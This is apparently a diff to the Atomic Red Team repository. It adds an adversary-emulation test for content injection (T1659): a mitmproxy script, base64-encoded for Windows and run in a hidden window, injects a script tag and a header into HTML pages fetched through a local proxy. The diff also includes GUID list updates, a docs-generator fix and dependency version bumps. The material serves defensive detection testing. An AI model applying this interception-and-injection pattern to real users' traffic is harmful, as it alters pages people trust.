+###### Check Prereq Commands
+
+```powershell
+if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
+```
+
+###### Get Prereq Commands
+
+```powershell
+$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
+[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
+Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
+Start-Sleep -Seconds 5
+if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
+```
+

atomics/T1659/T1659.yaml

@@ -0,0 +1,103 @@
+attack_technique: T1659
+display_name: Content Injection
+atomic_tests:
+  - name: MITM Proxy Injection
+    auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+    description: Start mitmdump and verify injected header and HTML content.
+    supported_platforms:
+      - macos
+      - linux
+    dependencies:
+      - description: python3 must be installed
+        prereq_command: |
+          command -v python3
+        get_prereq_command: |
+          brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
+
+      - description: curl must be installed
+        prereq_command: |
+          command -v curl
+        get_prereq_command: |
+          brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
+
+      - description: pipx must be installed
+        prereq_command: |
+          pipx --version
+        get_prereq_command: |
+          brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
+
+      - description: mitmproxy must be installed
+        prereq_command: |
+          pipx list | grep mitmproxy
+        get_prereq_command: |
+          pipx install mitmproxy || brew install mitmproxy
+      - description: mitmdump must be running on port 8080
+        prereq_command: |
+          lsof -i tcp:8080 | grep mitmdump
+        get_prereq_command: |
+          printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+          ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+          sleep 5
+          lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+    executor:
+      name: bash
+      command: |
+        curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+        grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+        curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+        grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+      cleanup_command: |
+        rm -rf /tmp/atomic_t1659_inject.py
+        rm -rf /tmp/atomic_t1659.log
+        rm -rf /tmp/curl_out.txt
+        rm -rf /tmp/atomic_t1659_page.html
+        pkill -f mitmdump || true
+
+  - name: MITM Proxy Injection (Windows)
+    auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
+    description: Start mitmdump proxy with injection script in the background.
+    supported_platforms:
+      - windows
+    dependencies:
+      - description: Python must be installed
+        prereq_command: |
+          if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          winget install --id Python.Python.3 -e
+
+      - description: curl must be installed
+        prereq_command: |
+          if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          winget install --id cURL.cURL -e
+
+      - description: mitmproxy must be installed and in PATH
+        prereq_command: |
+          if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          python -m pip install mitmproxy
+      - description: mitmdump must be running on port 8080
+        prereq_command: |
+          if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          $code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
+          [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
+          Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
+          Start-Sleep -Seconds 5
+          if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
+    executor:
+      name: powershell
+      elevation_required: false
+      command: |
+        curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
+        if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
+        $OutPath = "$env:TEMP\atomic_t1659_page.html"
+        curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
+        $Content = Get-Content -Path $OutPath -Raw
+        if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
+      cleanup_command: |
+        Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
+        Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
+        Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
+        Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
+        Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue

atomics/used_guids.txt

@@ -1800,3 +1800,20 @@ c7be89f7-5d06-4321-9f90-8676a77e0502
 4608bc1b-e682-466b-a7d7-dbd76760db31
 6683baf0-6e77-4f58-b114-814184ea8150
 c2ca068a-eb1e-498f-9f93-3d554c455916
+0ee8081f-e9a7-4a2e-a23f-68473023184f
+e58c8723-5503-4533-b642-535cd20ec648
+a1fa406e-2354-4a24-b6d6-94157e7564d4
+dce49381-a26b-4d95-bdfa-c607ffe8bee5
+6123928f-6389-4914-8d25-a5d69bd657fa
+a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
+1e5be8d4-605a-4acb-8709-2f80b2d8ea95
+2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
+6fec8560-ff64-4bbf-bc79-734fea48f7ca
+9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+dcc2ca85-a21c-43a4-acc7-7314d4e5891c
+ffadc988-b682-4a68-bd7e-4803666be637
+bddfd8d4-7687-4971-b611-50a537ab3ab4
+b0bd3d76-a57c-4699-83f4-8cd798dd09bd
+5ff5249a-5807-480e-ab52-c430497a8a25
+cb814cf8-24f2-41dc-a1cd-1c2073276d4a
+cc367493-3a00-4c4a-a685-16b73339167c

bin/generate-atomic-docs.rb

@@ -59,7 +59,7 @@ class AtomicRedTeamDocs
     generate_index_csv!  "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Indexes-CSV/office-365-index.csv", only_platform: /office-365/, attack_platform: /office/
     generate_index_csv!  "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Indexes-CSV/google-workspace-index.csv", only_platform: /google-workspace/, attack_platform: /identity/
     generate_index_csv!  "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Indexes-CSV/azure-ad-index.csv", only_platform: /azure-ad/, attack_platform: /identity/
-    generate_index_csv!  "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Indexes-CSV/azure-ad-index.csv", only_platform: /esxi/, attack_platform: /esxi/
+    generate_index_csv!  "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Indexes-CSV/esxi-index.csv", only_platform: /esxi/, attack_platform: /esxi/
 
     generate_yaml_index! "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/index.yaml"
     ["windows", "macos", "linux", "office-365", "azure-ad", "google-workspace", "saas", "iaas", "containers", "iaas:gcp", "iaas:azure", "iaas:aws", "esxi"].each do | platform|
@@ -241,10 +241,10 @@ class AtomicRedTeamDocs
 
     layer = {
       "name" => layer_name,
-      "versions" => {	"attack": "16",	"navigator": "5.1.0",	"layer": "4.5"	},
+      "versions" => {	"attack": "18",	"navigator": "5.3.0",	"layer": "4.5"	},
       "description" => layer_name + " MITRE ATT&CK Navigator Layer",
       "domain" => "enterprise-attack",
-      "filters"=> filters,    
+      "filters"=> filters,
       "gradient" => {
                   "colors" => ["#ffffff",
                                "#ce232e"
@@ -265,11 +265,11 @@ class AtomicRedTeamDocs
       "techniques" => techniques
     }
   end
-  
+
 
   #
   # Process the current technique and update the list
-  # 
+  #
   def update_techniquesList(current_technique, current_techniqueParent, techniques_list, atomic_yaml, comments)
     if not atomic_yaml['attack_technique'].include?(".") then
       tech_parent = techniques_list.find { |h| h["techniqueID"] == atomic_yaml['attack_technique'].split('.')[0] }
@@ -298,7 +298,7 @@ class AtomicRedTeamDocs
       techniques_list.push(current_technique)
     end
   end
-  
+
   #
   # Generates a MITRE ATT&CK Navigator Layer based on contributed techniques
   #
@@ -385,7 +385,7 @@ class AtomicRedTeamDocs
             win_technique['score'] += 1
             win_technique['comment'] += "- " + atomic['name'] + "\n"
           end
-          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then 
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then
             has_macos_tests = true
             macos_technique['score'] += 1
             macos_technique['comment'] += "- " + atomic['name'] + "\n"
@@ -441,7 +441,7 @@ class AtomicRedTeamDocs
             esxi_technique['comment'] += "- " + atomic['name'] + "\n"
           end
         end
-        
+
         # Update full Atomic Layer
         update_techniquesList(technique, techniqueParent, techniques, atomic_yaml, false)
         # Update all other Atomic Layers
@@ -483,9 +483,9 @@ class AtomicRedTeamDocs
         end
       end
     end
-    
+
     puts techniques_iaas_gcp
-    
+
     layer = get_layer techniques, "Atomic Red Team"
     layer_win = get_layer techniques_win, "Atomic Red Team (Windows)"
     layer_mac = get_layer techniques_mac, "Atomic Red Team (macOS)"

poetry.lock

@@ -201,21 +201,21 @@ files = [
 
 [[package]]
 name = "hypothesis"
-version = "6.151.5"
+version = "6.152.1"
 description = "The property-based testing library for Python"
 optional = false
 python-versions = ">=3.10"
 groups = ["main"]
 files = [
-    {file = "hypothesis-6.151.5-py3-none-any.whl", hash = "sha256:c0e15c91fa0e67bc0295551ef5041bebad42753b7977a610cd7a6ec1ad04ef13"},
-    {file = "hypothesis-6.151.5.tar.gz", hash = "sha256:ae3a0622f9693e6b19c697777c2c266c02801f9769ab7c2c37b7ec83d4743783"},
+    {file = "hypothesis-6.152.1-py3-none-any.whl", hash = "sha256:40a3619d9e0cb97b018857c7986f75cf5de2e5ec0fa8a0b172d00747758f749e"},
+    {file = "hypothesis-6.152.1.tar.gz", hash = "sha256:4f4ed934eee295dd84ee97592477d23e8dc03e9f12ae0ee30a4e7c9ef3fca3b0"},
 ]
 
 [package.dependencies]
 sortedcontainers = ">=2.1.0,<3.0.0"
 
 [package.extras]
-all = ["black (>=20.8b0)", "click (>=7.0)", "crosshair-tool (>=0.0.102)", "django (>=4.2)", "dpcontracts (>=0.4)", "hypothesis-crosshair (>=0.0.27)", "lark (>=0.10.1)", "libcst (>=0.3.16)", "numpy (>=1.21.6)", "pandas (>=1.1)", "pytest (>=4.6)", "python-dateutil (>=1.4)", "pytz (>=2014.1)", "redis (>=3.0.0)", "rich (>=9.0.0)", "tzdata (>=2025.3) ; sys_platform == \"win32\" or sys_platform == \"emscripten\"", "watchdog (>=4.0.0)"]
+all = ["black (>=20.8b0)", "click (>=7.0)", "crosshair-tool (>=0.0.102)", "django (>=4.2)", "dpcontracts (>=0.4)", "hypothesis-crosshair (>=0.0.27)", "lark (>=0.10.1)", "libcst (>=0.3.16)", "numpy (>=1.21.6)", "pandas (>=1.1)", "pytest (>=4.6)", "python-dateutil (>=1.4)", "pytz (>=2014.1)", "redis (>=3.0.0)", "rich (>=9.0.0)", "tzdata (>=2026.1) ; sys_platform == \"win32\" or sys_platform == \"emscripten\"", "watchdog (>=4.0.0)"]
 cli = ["black (>=20.8b0)", "click (>=7.0)", "rich (>=9.0.0)"]
 codemods = ["libcst (>=0.3.16)"]
 crosshair = ["crosshair-tool (>=0.0.102)", "hypothesis-crosshair (>=0.0.27)"]
@@ -230,7 +230,7 @@ pytest = ["pytest (>=4.6)"]
 pytz = ["pytz (>=2014.1)"]
 redis = ["redis (>=3.0.0)"]
 watchdog = ["watchdog (>=4.0.0)"]
-zoneinfo = ["tzdata (>=2025.3) ; sys_platform == \"win32\" or sys_platform == \"emscripten\""]
+zoneinfo = ["tzdata (>=2026.1) ; sys_platform == \"win32\" or sys_platform == \"emscripten\""]
 
 [[package]]
 name = "idna"
@@ -362,19 +362,19 @@ testing = ["coverage", "pytest", "pytest-benchmark"]
 
 [[package]]
 name = "pydantic"
-version = "2.12.5"
+version = "2.13.2"
 description = "Data validation using Python type hints"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "pydantic-2.12.5-py3-none-any.whl", hash = "sha256:e561593fccf61e8a20fc46dfc2dfe075b8be7d0188df33f221ad1f0139180f9d"},
-    {file = "pydantic-2.12.5.tar.gz", hash = "sha256:4d351024c75c0f085a9febbb665ce8c0c6ec5d30e903bdb6394b7ede26aebb49"},
+    {file = "pydantic-2.13.2-py3-none-any.whl", hash = "sha256:a525087f4c03d7e7456a3de89b64cd693d2229933bb1068b9af6befd5563694e"},
+    {file = "pydantic-2.13.2.tar.gz", hash = "sha256:b418196607e61081c3226dcd4f0672f2a194828abb9109e9cfb84026564df2d1"},
 ]
 
 [package.dependencies]
 annotated-types = ">=0.6.0"
-pydantic-core = "2.41.5"
+pydantic-core = "2.46.2"
 typing-extensions = ">=4.14.1"
 typing-inspection = ">=0.4.2"
 
@@ -384,133 +384,132 @@ timezone = ["tzdata ; python_version >= \"3.9\" and platform_system == \"Windows
 
 [[package]]
 name = "pydantic-core"
-version = "2.41.5"
+version = "2.46.2"
 description = "Core functionality for Pydantic validation and serialization"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "pydantic_core-2.41.5-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:77b63866ca88d804225eaa4af3e664c5faf3568cea95360d21f4725ab6e07146"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:dfa8a0c812ac681395907e71e1274819dec685fec28273a28905df579ef137e2"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5921a4d3ca3aee735d9fd163808f5e8dd6c6972101e4adbda9a4667908849b97"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:e25c479382d26a2a41b7ebea1043564a937db462816ea07afa8a44c0866d52f9"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f547144f2966e1e16ae626d8ce72b4cfa0caedc7fa28052001c94fb2fcaa1c52"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:6f52298fbd394f9ed112d56f3d11aabd0d5bd27beb3084cc3d8ad069483b8941"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:100baa204bb412b74fe285fb0f3a385256dad1d1879f0a5cb1499ed2e83d132a"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:05a2c8852530ad2812cb7914dc61a1125dc4e06252ee98e5638a12da6cc6fb6c"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:29452c56df2ed968d18d7e21f4ab0ac55e71dc59524872f6fc57dcf4a3249ed2"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-musllinux_1_1_armv7l.whl", hash = "sha256:d5160812ea7a8a2ffbe233d8da666880cad0cbaf5d4de74ae15c313213d62556"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:df3959765b553b9440adfd3c795617c352154e497a4eaf3752555cfb5da8fc49"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-win32.whl", hash = "sha256:1f8d33a7f4d5a7889e60dc39856d76d09333d8a6ed0f5f1190635cbec70ec4ba"},
-    {file = "pydantic_core-2.41.5-cp310-cp310-win_amd64.whl", hash = "sha256:62de39db01b8d593e45871af2af9e497295db8d73b085f6bfd0b18c83c70a8f9"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:a3a52f6156e73e7ccb0f8cced536adccb7042be67cb45f9562e12b319c119da6"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:7f3bf998340c6d4b0c9a2f02d6a400e51f123b59565d74dc60d252ce888c260b"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:378bec5c66998815d224c9ca994f1e14c0c21cb95d2f52b6021cc0b2a58f2a5a"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:e7b576130c69225432866fe2f4a469a85a54ade141d96fd396dffcf607b558f8"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6cb58b9c66f7e4179a2d5e0f849c48eff5c1fca560994d6eb6543abf955a149e"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:88942d3a3dff3afc8288c21e565e476fc278902ae4d6d134f1eeda118cc830b1"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f31d95a179f8d64d90f6831d71fa93290893a33148d890ba15de25642c5d075b"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:c1df3d34aced70add6f867a8cf413e299177e0c22660cc767218373d0779487b"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:4009935984bd36bd2c774e13f9a09563ce8de4abaa7226f5108262fa3e637284"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-musllinux_1_1_armv7l.whl", hash = "sha256:34a64bc3441dc1213096a20fe27e8e128bd3ff89921706e83c0b1ac971276594"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:c9e19dd6e28fdcaa5a1de679aec4141f691023916427ef9bae8584f9c2fb3b0e"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-win32.whl", hash = "sha256:2c010c6ded393148374c0f6f0bf89d206bf3217f201faa0635dcd56bd1520f6b"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-win_amd64.whl", hash = "sha256:76ee27c6e9c7f16f47db7a94157112a2f3a00e958bc626e2f4ee8bec5c328fbe"},
-    {file = "pydantic_core-2.41.5-cp311-cp311-win_arm64.whl", hash = "sha256:4bc36bbc0b7584de96561184ad7f012478987882ebf9f9c389b23f432ea3d90f"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-macosx_10_12_x86_64.whl", hash = "sha256:f41a7489d32336dbf2199c8c0a215390a751c5b014c2c1c5366e817202e9cdf7"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:070259a8818988b9a84a449a2a7337c7f430a22acc0859c6b110aa7212a6d9c0"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e96cea19e34778f8d59fe40775a7a574d95816eb150850a85a7a4c8f4b94ac69"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:ed2e99c456e3fadd05c991f8f437ef902e00eedf34320ba2b0842bd1c3ca3a75"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:65840751b72fbfd82c3c640cff9284545342a4f1eb1586ad0636955b261b0b05"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e536c98a7626a98feb2d3eaf75944ef6f3dbee447e1f841eae16f2f0a72d8ddc"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:eceb81a8d74f9267ef4081e246ffd6d129da5d87e37a77c9bde550cb04870c1c"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:d38548150c39b74aeeb0ce8ee1d8e82696f4a4e16ddc6de7b1d8823f7de4b9b5"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:c23e27686783f60290e36827f9c626e63154b82b116d7fe9adba1fda36da706c"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-musllinux_1_1_armv7l.whl", hash = "sha256:482c982f814460eabe1d3bb0adfdc583387bd4691ef00b90575ca0d2b6fe2294"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:bfea2a5f0b4d8d43adf9d7b8bf019fb46fdd10a2e5cde477fbcb9d1fa08c68e1"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-win32.whl", hash = "sha256:b74557b16e390ec12dca509bce9264c3bbd128f8a2c376eaa68003d7f327276d"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-win_amd64.whl", hash = "sha256:1962293292865bca8e54702b08a4f26da73adc83dd1fcf26fbc875b35d81c815"},
-    {file = "pydantic_core-2.41.5-cp312-cp312-win_arm64.whl", hash = "sha256:1746d4a3d9a794cacae06a5eaaccb4b8643a131d45fbc9af23e353dc0a5ba5c3"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-macosx_10_12_x86_64.whl", hash = "sha256:941103c9be18ac8daf7b7adca8228f8ed6bb7a1849020f643b3a14d15b1924d9"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:112e305c3314f40c93998e567879e887a3160bb8689ef3d2c04b6cc62c33ac34"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0cbaad15cb0c90aa221d43c00e77bb33c93e8d36e0bf74760cd00e732d10a6a0"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:03ca43e12fab6023fc79d28ca6b39b05f794ad08ec2feccc59a339b02f2b3d33"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:dc799088c08fa04e43144b164feb0c13f9a0bc40503f8df3e9fde58a3c0c101e"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:97aeba56665b4c3235a0e52b2c2f5ae9cd071b8a8310ad27bddb3f7fb30e9aa2"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:406bf18d345822d6c21366031003612b9c77b3e29ffdb0f612367352aab7d586"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:b93590ae81f7010dbe380cdeab6f515902ebcbefe0b9327cc4804d74e93ae69d"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-musllinux_1_1_aarch64.whl", hash = "sha256:01a3d0ab748ee531f4ea6c3e48ad9dac84ddba4b0d82291f87248f2f9de8d740"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-musllinux_1_1_armv7l.whl", hash = "sha256:6561e94ba9dacc9c61bce40e2d6bdc3bfaa0259d3ff36ace3b1e6901936d2e3e"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-musllinux_1_1_x86_64.whl", hash = "sha256:915c3d10f81bec3a74fbd4faebe8391013ba61e5a1a8d48c4455b923bdda7858"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-win32.whl", hash = "sha256:650ae77860b45cfa6e2cdafc42618ceafab3a2d9a3811fcfbd3bbf8ac3c40d36"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-win_amd64.whl", hash = "sha256:79ec52ec461e99e13791ec6508c722742ad745571f234ea6255bed38c6480f11"},
-    {file = "pydantic_core-2.41.5-cp313-cp313-win_arm64.whl", hash = "sha256:3f84d5c1b4ab906093bdc1ff10484838aca54ef08de4afa9de0f5f14d69639cd"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-macosx_10_12_x86_64.whl", hash = "sha256:3f37a19d7ebcdd20b96485056ba9e8b304e27d9904d233d7b1015db320e51f0a"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-macosx_11_0_arm64.whl", hash = "sha256:1d1d9764366c73f996edd17abb6d9d7649a7eb690006ab6adbda117717099b14"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:25e1c2af0fce638d5f1988b686f3b3ea8cd7de5f244ca147c777769e798a9cd1"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:506d766a8727beef16b7adaeb8ee6217c64fc813646b424d0804d67c16eddb66"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4819fa52133c9aa3c387b3328f25c1facc356491e6135b459f1de698ff64d869"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2b761d210c9ea91feda40d25b4efe82a1707da2ef62901466a42492c028553a2"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:22f0fb8c1c583a3b6f24df2470833b40207e907b90c928cc8d3594b76f874375"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:2782c870e99878c634505236d81e5443092fba820f0373997ff75f90f68cd553"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-musllinux_1_1_aarch64.whl", hash = "sha256:0177272f88ab8312479336e1d777f6b124537d47f2123f89cb37e0accea97f90"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-musllinux_1_1_armv7l.whl", hash = "sha256:63510af5e38f8955b8ee5687740d6ebf7c2a0886d15a6d65c32814613681bc07"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-musllinux_1_1_x86_64.whl", hash = "sha256:e56ba91f47764cc14f1daacd723e3e82d1a89d783f0f5afe9c364b8bb491ccdb"},
-    {file = "pydantic_core-2.41.5-cp314-cp314-win32.whl", hash = "sha256:aec5cf2fd867b4ff45b9959f8b20ea3993fc93e63c7363fe6851424c8a7e7c23"},
